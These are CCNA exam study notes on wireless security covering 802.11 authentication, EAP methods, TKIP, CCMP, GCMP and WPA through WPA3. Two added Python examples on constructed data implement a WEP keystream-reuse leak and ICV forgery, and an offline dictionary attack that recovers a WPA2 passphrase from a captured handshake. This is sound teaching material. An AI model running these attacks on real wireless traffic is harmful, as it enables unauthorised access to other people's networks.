CCNA Notes

200-301 Exam Prep


57. WIRELESS SECURITY

INTRO TO WIRELESS NETWORK SECURITY

  • Although SECURITY is important in ALL NETWORKS, it is even more essential in WIRELESS NETWORKS

  • Because WIRELESS SIGNALS are not contained within a WIRE, any DEVICE within range of the signal can receive traffic

  • In WIRED NETWORKS, traffic is often only ENCRYPTED when sent over an UNTRUSTED NETWORK such as the INTERNET

  • In WIRELESS NETWORKS, it is VERY important to ENCRYPT traffic sent between the WIRELESS CLIENTS and the AP

  • We will cover THREE MAIN CONCEPTS:

    • AUTHENTICATION
    • ENCRYPTION
    • INTEGRITY

AUTHENTICATION

  • All CLIENTS must be AUTHENTICATED before they can associate with an AP
  • In a corporate setting, only TRUSTED USERS / DEVICES should be given ACCESS to the NETWORK
    • In corporate settings, a separate SSID which doesn’t have ACCESS to the corporate NETWORK can be provided for GUEST USERS
  • Ideally, CLIENTS should also AUTHENTICATE the AP to avoid associating with a malicious AP
  • There are MULTIPLE WAYS to AUTHENTICATE:
    • PASSWORD
    • USERNAME / PASSWORD
    • CERTIFICATES



ENCRYPTION

  • Traffic sent between CLIENTS and APs should be ENCRYPTED so that it can’t be read by anyone except the AP and the CLIENT
  • There are many possible PROTOCOLS that can be used to ENCRYPT traffic
  • All DEVICES on the WLAN will use the same PROTOCOL, however each CLIENT will use a unique ENCRYPTION / DECRYPTION KEY so that other DEVICES can’t read its traffic
  • A “GROUP KEY” is used by the AP to ENCRYPT traffic that it wants to send to all of its clients
    • All of the CLIENTS associated with the AP keep that key so they can DECRYPT the traffic

INTEGRITY

  • As explained in the “SECURITY FUNDAMENTALS” video of the course, INTEGRITY ensures that the message is not modified by a third-party
  • The message that is sent by the SOURCE HOST should be the same as the message that is received by the DESTINATION HOST
  • A MIC (Message Integrity Check) is added to the message to protect its INTEGRITY: the RECEIVER recomputes the MIC with a KEY it shares with the SENDER and drops the FRAME if the two values don’t match



AUTHENTICATION METHODS

The original 802.11 STANDARD included TWO OPTIONS for AUTHENTICATION:

  • OPEN AUTHENTICATION
    • The CLIENT sends an AUTHENTICATION REQUEST and the AP just accepts it
    • This is clearly NOT a SECURE AUTHENTICATION method
    • After the CLIENT is AUTHENTICATED and associated with the AP, it’s possible to require the USER to AUTHENTICATE via other methods (e.g. a CAPTIVE PORTAL web page) before ACCESS to the NETWORK is granted (e.g. Starbucks WI-FI)
  • WEP (Wired Equivalent Privacy)
    • WEP is used to provide both AUTHENTICATION and ENCRYPTION of WIRELESS traffic
    • For ENCRYPTION, WEP uses the RC4 ALGORITHM
    • WEP is a “SHARED-KEY” PROTOCOL, requiring the SENDER and RECEIVER to have the same KEY
    • WEP KEYS can be 40 bits or 104 bits in length
    • The above KEYS are combined with a 24-bit “IV” (INITIALIZATION VECTOR), which is sent in the clear in every FRAME, to bring the total RC4 KEY length to 64 bits or 128 bits
    • WEP ENCRYPTION is NOT SECURE and can easily be cracked: the IV space is small, so the same RC4 KEYSTREAM gets reused, and the CRC-32 INTEGRITY CHECK (ICV) can be forged without the KEY
    • WEP SHARED-KEY AUTHENTICATION is a CHALLENGE / RESPONSE: the AP sends a random CHALLENGE, the CLIENT returns it ENCRYPTED with the WEP KEY, and the AP DECRYPTS it to verify that the CLIENT has the same KEY (anyone listening sees both the CHALLENGE and its CIPHERTEXT, which reveals a KEYSTREAM)

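A worked example of the two WEP weaknesses just described, added to these notes (it is not course material or any vendor’s code): a minimal WEP implementation in Python using the real RC4 cipher and CRC-32 ICV, then an IV-reuse leak and an ICV forgery. The 40-bit key, the IV and the frame contents are constructed sample data.

```python
import zlib
from typing import Optional

# Constructed example: WEP-40 with the real RC4 + CRC-32 ICV construction.
# The key, IV and payloads are made-up sample data, not captured traffic.


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling algorithm, then the pseudo-random generator."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Return iv || RC4_{iv||key}(plaintext || CRC-32 ICV), exactly as WEP frames it.
    key is 5 bytes (WEP-40) or 13 bytes (WEP-104); iv is 3 bytes (24 bits)."""
    assert len(key) in (5, 13) and len(iv) == 3
    icv = zlib.crc32(plaintext).to_bytes(4, "little")
    body = plaintext + icv
    return iv + xor(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes) -> Optional[bytes]:
    """Decrypt and verify the ICV; None means the receiver would drop the frame."""
    iv, ct = frame[:3], frame[3:]
    body = xor(ct, rc4_keystream(iv + key, len(ct)))
    plaintext, icv = body[:-4], body[-4:]
    if zlib.crc32(plaintext).to_bytes(4, "little") != icv:
        return None
    return plaintext


def keystream_reuse_leak(frame_a: bytes, frame_b: bytes) -> Optional[bytes]:
    """Weakness 1: same key + same IV = same keystream, so XOR of two ciphertexts
    is XOR of the two plaintexts. No key needed."""
    if frame_a[:3] != frame_b[:3]:
        return None
    return xor(frame_a[3:], frame_b[3:])


def wep_bitflip(frame: bytes, delta: bytes) -> bytes:
    """Weakness 2: CRC-32 is linear, so flipping plaintext bits through the
    ciphertext and patching the (encrypted) ICV keeps the frame valid."""
    iv, ct = frame[:3], frame[3:]
    n = len(ct) - 4
    assert len(delta) == n
    # crc32(p ^ d) == crc32(p) ^ crc32(d) ^ crc32(zeros of the same length)
    icv_delta = zlib.crc32(delta) ^ zlib.crc32(bytes(n))
    return iv + xor(ct, delta + icv_delta.to_bytes(4, "little"))


def demo() -> dict:
    key = b"\x01\x02\x03\x04\x05"           # constructed 40-bit WEP key
    iv = b"\x0a\x0b\x0c"                    # constructed 24-bit IV
    p1 = b"GET /index.html "                # 16 bytes
    p2 = b"PASS s3cret-pw  "                # 16 bytes, same length as p1
    f1 = wep_encrypt(key, iv, p1)
    f2 = wep_encrypt(key, iv, p2)           # IV reused: unavoidable with 2^24 IVs

    # Eavesdropper: if one plaintext is guessable (HTTP, ARP, ...), the other falls out.
    leak = keystream_reuse_leak(f1, f2)[: len(p1)]
    recovered_p2 = xor(leak, p1)

    # Active attacker: rewrite the request path without the key; ICV still verifies.
    target = b"GET /admin.html "
    delta = xor(p1, target)
    forged = wep_bitflip(f1, delta)
    naive = iv + xor(f1[3:], delta + bytes(4))   # same flip, ICV left alone

    return {
        "roundtrip": wep_decrypt(key, f1),
        "recovered_p2": recovered_p2,
        "forged_plaintext": wep_decrypt(key, forged),
        "naive_tamper_accepted": wep_decrypt(key, naive) is not None,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

The unkeyed CRC-32 ICV is exactly the gap that TKIP’s keyed MIC (and later CCMP’s CBC-MAC) closes: the naive tamper fails the ICV only by accident of not patching it, while the patched forgery is accepted by a receiver that holds the key.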


EAP (Extensible Authentication Protocol)

  • EAP is an AUTHENTICATION FRAMEWORK
  • It defines a STANDARD SET of AUTHENTICATION FUNCTIONS that are used by the various EAP METHODS
  • We will look at FOUR EAP METHODS:
    • LEAP
    • EAP-FAST
    • PEAP
    • EAP-TLS
  • EAP is integrated with 802.1X which provides PORT-BASED NETWORK ACCESS CONTROL

802.1X is used to limit NETWORK ACCESS for CLIENTS connected to a LAN or WLAN until they AUTHENTICATE

There are THREE MAIN ENTITIES in 802.1X:

  • SUPPLICANT : The DEVICE that wants to connect to the NETWORK
  • AUTHENTICATOR : The DEVICE that provides access to the NETWORK
  • AUTHENTICATION SERVER (AS) : The DEVICE that receives CLIENT credentials and PERMITS / DENIES ACCESS


  • LEAP (Lightweight EAP)
    • LEAP was developed by Cisco as an improvement over WEP
    • CLIENTS must provide a USERNAME and PASSWORD to AUTHENTICATE
    • In addition, MUTUAL AUTHENTICATION is provided: the CLIENT and SERVER each send a CHALLENGE to the other and verify the RESPONSE
    • DYNAMIC WEP KEYS are used, meaning that the WEP KEYS are changed frequently
    • Like WEP, LEAP is considered vulnerable and should not be used anymore


  • EAP-FAST (EAP FLEXIBLE AUTHENTICATION via SECURE TUNNELING)
    • EAP-FAST was also developed by Cisco
    • Consists of THREE PHASES:
      • A PAC (PROTECTED ACCESS CREDENTIAL) is generated and passed from SERVER to CLIENT
      • A SECURE TLS TUNNEL is established between the CLIENT and AUTHENTICATION SERVER
      • Inside of the SECURE (ENCRYPTED) TLS TUNNEL, the CLIENT and SERVER communicate further to AUTHENTICATE / AUTHORIZE the CLIENT


  • PEAP (PROTECTED EAP)
    • Like EAP-FAST, PEAP involves establishing a SECURE TLS TUNNEL between the CLIENT and SERVER
    • Instead of a PAC, the SERVER has a DIGITAL CERTIFICATE
    • The CLIENT uses this DIGITAL CERTIFICATE to AUTHENTICATE the SERVER
    • The CERTIFICATE is also used to establish a TLS TUNNEL
    • Because only the SERVER provides a CERTIFICATE for AUTHENTICATION, the CLIENT must still be AUTHENTICATED within the SECURE TUNNEL
      • Example: MS-CHAP (Microsoft Challenge-Handshake Authentication Protocol), in practice MS-CHAPv2


  • EAP-TLS (EAP TRANSPORT LAYER SECURITY)
    • Whereas PEAP only requires the AS to have a CERTIFICATE, EAP-TLS requires a CERTIFICATE on the AS and on every single CLIENT
    • EAP-TLS is the MOST SECURE WIRELESS AUTHENTICATION method, but it is more difficult to implement than PEAP because every CLIENT DEVICE needs a CERTIFICATE
    • Because the CLIENT and SERVER AUTHENTICATE each other with DIGITAL CERTIFICATES, there is no need to AUTHENTICATE the CLIENT within the TLS TUNNEL
    • The TLS TUNNEL is still used to exchange ENCRYPTION KEY information (ENCRYPTION methods will be discussed next)



ENCRYPTION / INTEGRITY METHODS

  • TKIP (Temporal Key Integrity Protocol)
    • WEP was found to be vulnerable, but the WIRELESS hardware of the time was built around WEP’s RC4 ENCRYPTION
    • A temporary solution that could run on that existing hardware was needed until a new STANDARD was created and new HARDWARE was built
    • TKIP adds various SECURITY FEATURES:
      • A MIC (Message Integrity Check) is added to protect the integrity of messages
      • A KEY MIXING ALGORITHM is used to create a unique WEP key for every frame
      • The INITIALIZATION VECTOR is doubled in length from 24 bits to 48 bits, so a KEY / IV pair (and therefore an RC4 KEYSTREAM) is not reused during the life of a KEY; IV reuse is what made the attacks on WEP practical
      • The MIC includes the SENDER MAC ADDRESS to identify the FRAME’s SENDER
      • A TIMESTAMP is added to the MIC to prevent REPLAY ATTACKS. Replay attacks involve re-sending a FRAME that has already been transmitted
      • A TKIP SEQUENCE NUMBER is used to keep track of FRAMES sent from each SOURCE MAC ADDRESS. This also protects against REPLAY ATTACKS

** You probably don’t need to memorize ALL of the above features

** TKIP is used in WPA version 1, which will be discussed in the next section

  • CCMP (Counter / CBC-MAC Protocol)

    • CCMP was developed after TKIP and is more SECURE
    • It is used in WPA2
    • To use CCMP, it must be supported by the DEVICE’S hardware.
    • Old hardware built only to use WEP / TKIP cannot use CCMP
    • CCMP consists of TWO DIFFERENT ALGORITHMS to provide ENCRYPTION and MIC :
      • AES (Advanced Encryption Standard) COUNTER MODE ENCRYPTION
        • AES is a thoroughly analysed BLOCK CIPHER (an ALGORITHM, not a PROTOCOL) and is the standard choice for strong ENCRYPTION today
        • Widely used all over the world
        • There are multiple MODES of operation for AES.
        • CCMP uses “COUNTER MODE”
      • CBC-MAC (CIPHER BLOCK CHAINING MESSAGE AUTHENTICATION CODE)
        • Used as a MIC to ENSURE the INTEGRITY of MESSAGES
  • GCMP (GALOIS / COUNTER MODE PROTOCOL)

    • GCMP is MORE SECURE and EFFICIENT than CCMP
    • Its increased efficiency allows higher data throughput than CCMP
    • It was introduced with WPA3: GCMP-256 is required by the WPA3-ENTERPRISE 192-bit mode, while WPA3-PERSONAL still uses CCMP-128 as its baseline CIPHER
    • GCMP consists of TWO ALGORITHMS:
      • AES COUNTER MODE ENCRYPTION
      • GMAC (GALOIS MESSAGE AUTHENTICATION CODE)
        • Used as a MIC to ENSURE the INTEGRITY of MESSAGE

WI-FI PROTECTED ACCESS (WPA)

  • The WI-FI Alliance has developed THREE WPA CERTIFICATIONS for WIRELESS DEVICES:

    • WPA
    • WPA2
    • WPA3
  • To be WPA-CERTIFIED, EQUIPMENT must be TESTED in authorized testing labs

  • All of the above support TWO AUTHENTICATION MODES:

    • PERSONAL MODE :
      • A PRE-SHARED KEY (PSK) is used for AUTHENTICATION
      • When you connect to a home WI-FI NETWORK, enter the PASSWORD and are AUTHENTICATED, that is PERSONAL MODE
      • This is common in small NETWORKS
      • The PSK itself is NOT sent over the air
      • A FOUR-WAY HANDSHAKE is used for AUTHENTICATION: the PSK (derived from the PASSWORD and the SSID) is the PMK, the AP and CLIENT exchange random NONCES, and each side derives the ENCRYPTION KEYS (PTK) from PMK + NONCES + MAC ADDRESSES; a MIC on the handshake messages proves that both sides hold the same PSK
    • ENTERPRISE MODE :
      • 802.1X is used with an AUTHENTICATION SERVER (RADIUS SERVER)
      • No specific EAP METHOD is specified, so all are supported (PEAP, EAP-TLS, etc)

    WPA

    • The WPA CERTIFICATION was developed after WEP was proven to be vulnerable and includes the following PROTOCOLS:
      • TKIP (based on WEP) provides ENCRYPTION / MIC
      • 802.1X AUTHENTICATION (ENTERPRISE MODE) or PSK (PERSONAL MODE)

    WPA2

    • Was released in 2004 and includes the following PROTOCOLS:
      • CCMP provides ENCRYPTION / MIC
      • 802.1X AUTHENTICATION (ENTERPRISE MODE) or PSK (PERSONAL MODE)

    WPA3

    • Was released in 2018 and includes the following PROTOCOLS:
      • CCMP-128 (PERSONAL) or GCMP-256 (ENTERPRISE 192-bit mode) provides ENCRYPTION / MIC

      • 802.1X AUTHENTICATION (ENTERPRISE MODE) or a PASSWORD via SAE (PERSONAL MODE)

      • WPA3 also provides several additional security features:

        • PMF (PROTECTED MANAGEMENT FRAMES)
          • Protecting 802.11 MANAGEMENT FRAMES from eavesdropping / forging
        • SAE (SIMULTANEOUS AUTHENTICATION OF EQUALS)
          • Replaces the PSK-based key derivation of PERSONAL MODE with a PASSWORD-AUTHENTICATED KEY EXCHANGE, so an ATTACKER who captures the FOUR-WAY HANDSHAKE can no longer test PASSWORD guesses OFFLINE; every guess requires a live exchange with the AP
        • FORWARD SECRECY
          • Each SESSION gets a fresh PMK from the SAE exchange, so an ATTACKER who captures WIRELESS FRAMES and later learns the PASSWORD still can’t DECRYPT them
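A worked example in Python of the PERSONAL MODE four-way handshake described above, and of the offline password-guessing weakness that WPA3’s SAE and forward secrecy address. It is added to these notes and is not course material or a vendor implementation. PBKDF2, the 802.11i PRF and the EAPOL MIC are the real WPA/WPA2 algorithms (the PMK for passphrase “password” and SSID “IEEE” matches the published 802.11i test vector); the SSID, MAC addresses, nonces, EAPOL message body and wordlist are constructed sample data.

```python
import hashlib
import hmac
from typing import Optional

# Added example: WPA/WPA2-Personal key derivation and handshake MIC, then the
# offline dictionary attack a captured handshake permits. MACs, nonces, SSID,
# EAPOL body and wordlist below are constructed, not captured.


def pmk_from_psk(passphrase: str, ssid: str) -> bytes:
    """Passphrase -> 256-bit PMK: PBKDF2-HMAC-SHA1, salt = SSID, 4096 rounds."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || counter), concatenated."""
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> dict:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max MACs || min/max nonces).
    384 bits is the CCMP layout: KCK (handshake MIC) | KEK (wraps the GTK) | TK (data)."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, 48)
    return {"kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


def eapol_mic(kck: bytes, eapol_frame_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): MIC = HMAC-SHA1(KCK, frame with MIC field zeroed)[:16]."""
    return hmac.new(kck, eapol_frame_mic_zeroed, hashlib.sha1).digest()[:16]


def four_way_handshake(passphrase, ssid, aa, spa, anonce, snonce, msg2_body) -> dict:
    """What the client computes and what goes over the air: nonces, MACs and a MIC.
    The PSK/PMK never leaves either side."""
    pmk = pmk_from_psk(passphrase, ssid)
    keys = derive_ptk(pmk, aa, spa, anonce, snonce)
    return {"pmk": pmk, "tk": keys["tk"], "mic": eapol_mic(keys["kck"], msg2_body)}


def crack_psk(ssid, aa, spa, anonce, snonce, msg2_body, captured_mic, wordlist) -> Optional[str]:
    """Offline dictionary attack: everything needed is in one captured handshake
    plus the beacon's SSID. This is what SAE in WPA3-Personal takes away."""
    for candidate in wordlist:
        kck = derive_ptk(pmk_from_psk(candidate, ssid), aa, spa, anonce, snonce)["kck"]
        if hmac.compare_digest(eapol_mic(kck, msg2_body), captured_mic):
            return candidate
    return None


# Constructed sample handshake parameters.
SSID = "HomeNet"
AA = bytes.fromhex("001122334455")           # AP (authenticator) MAC
SPA = bytes.fromhex("66778899aabb")          # client (supplicant) MAC
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
MSG2 = b"\x02\x03\x00\x75" + bytes(0x75)     # stand-in EAPOL-Key message 2, MIC zeroed


def demo() -> Optional[str]:
    over_the_air = four_way_handshake("correct horse", SSID, AA, SPA, ANONCE, SNONCE, MSG2)
    wordlist = ["password", "12345678", "letmein1", "correct horse", "HomeNet1"]
    return crack_psk(SSID, AA, SPA, ANONCE, SNONCE, MSG2, over_the_air["mic"], wordlist)


if __name__ == "__main__":
    print("802.11i test vector PMK:", pmk_from_psk("password", "IEEE").hex())
    print("passphrase recovered from captured handshake:", demo())
```

Two things to take from running it: the PSK is indeed never transmitted (only nonces, MACs and a MIC are), yet one captured handshake lets an attacker test candidate passphrases as fast as PBKDF2 runs, which is why WPA2-Personal lives or dies by passphrase strength. Under WPA3 the PMK comes from the SAE exchange instead of directly from the passphrase, so the MIC no longer serves as an offline oracle, and because that PMK is fresh per session the traffic stays protected even if the passphrase is later learned.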